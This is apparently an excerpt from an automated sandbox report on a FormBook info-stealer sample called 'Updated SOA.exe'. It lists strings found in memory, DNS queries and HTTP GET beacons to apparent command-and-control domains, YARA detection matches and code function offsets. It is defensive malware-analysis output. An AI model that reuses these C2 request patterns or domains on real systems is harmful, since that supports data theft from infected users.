          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdVm
          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
          Source: Updated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita
          Source: Updated SOA.exe, 00000000.00000003.225620409.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
          Source: Updated SOA.exe, 00000000.00000003.221660173.0000000005A43000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: Updated SOA.exe, 00000000.00000003.220153841.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv/
          Source: Updated SOA.exe, 00000000.00000003.220255868.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comttaVm
          Source: Updated SOA.exe, 00000000.00000003.214516904.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Updated SOA.exe, 00000000.00000003.214516904.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn-m;
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Updated SOA.exe, 00000000.00000003.222236047.0000000005A3D000.00000004.00000001.sdmp, Updated SOA.exe, 00000000.00000003.222249785.0000000005A2B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Updated SOA.exe, 00000000.00000003.222369178.0000000005A40000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/Vm
          Source: Updated SOA.exe, 00000000.00000003.222547008.0000000005A22000.00000004.00000001.sdmp, Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Updated SOA.exe, 00000000.00000003.222547008.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Updated SOA.exe, 00000000.00000003.218881873.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Updated SOA.exe, 00000000.00000003.217945540.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//MS
          Source: Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0.
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=lP
          Source: Updated SOA.exe, 00000000.00000003.217945540.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ll
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: Updated SOA.exe, 00000000.00000003.217644438.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0;
          Source: Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/gl&
          Source: Updated SOA.exe, 00000000.00000003.218881873.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/gl&
          Source: Updated SOA.exe, 00000000.00000003.217644438.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/kanLl
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nl-n/l~
          Source: Updated SOA.exe, 00000000.00000003.218881873.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r-t
          Source: Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-e
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ul
          Source: Updated SOA.exe, 00000000.00000003.216978362.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
          Source: Updated SOA.exe, 00000000.00000003.218305716.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~l
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Updated SOA.exe, 00000000.00000003.218131290.0000000005A66000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Updated SOA.exe, 00000000.00000003.215288467.0000000005A2A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Updated SOA.exe, 00000000.00000003.214865561.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netFGl
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netayl
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netom
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netute
          Source: Updated SOA.exe, 00000000.00000003.221427725.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Updated SOA.exe, 00000000.00000003.221427725.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dex
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.carts-amazon.com
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.kutahyaescortbayanlarim.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.emilfaucets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.sunshinefamilysupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.invetorsbank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.loccssol.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.brightlifeprochoice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.starsspell.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4X HTTP/1.1Host: www.newstodayupdate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Updated SOA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0106CC340_2_0106CC34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0106F0770_2_0106F077
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0106F0780_2_0106F078
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_074F66280_2_074F6628
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_074F66380_2_074F6638
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_074FC2300_2_074FC230
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_074F6D5B0_2_074F6D5B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_074FCD980_2_074FCD98
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_077354E00_2_077354E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0773A0700_2_0773A070
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_077354D00_2_077354D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0773A0610_2_0773A061
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_077350A80_2_077350A8
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_077350990_2_07735099
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0773CE980_2_0773CE98
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0773CE8B0_2_0773CE8B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_07734C790_2_07734C79
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_077389B00_2_077389B0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_0773899F0_2_0773899F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 0_2_081028080_2_08102808
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041B8B37_2_0041B8B3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041D1E97_2_0041D1E9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041C9837_2_0041C983
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041D2477_2_0041D247
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041D3527_2_0041D352
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041CB6E7_2_0041CB6E
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041CBE67_2_0041CBE6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041C3B07_2_0041C3B0
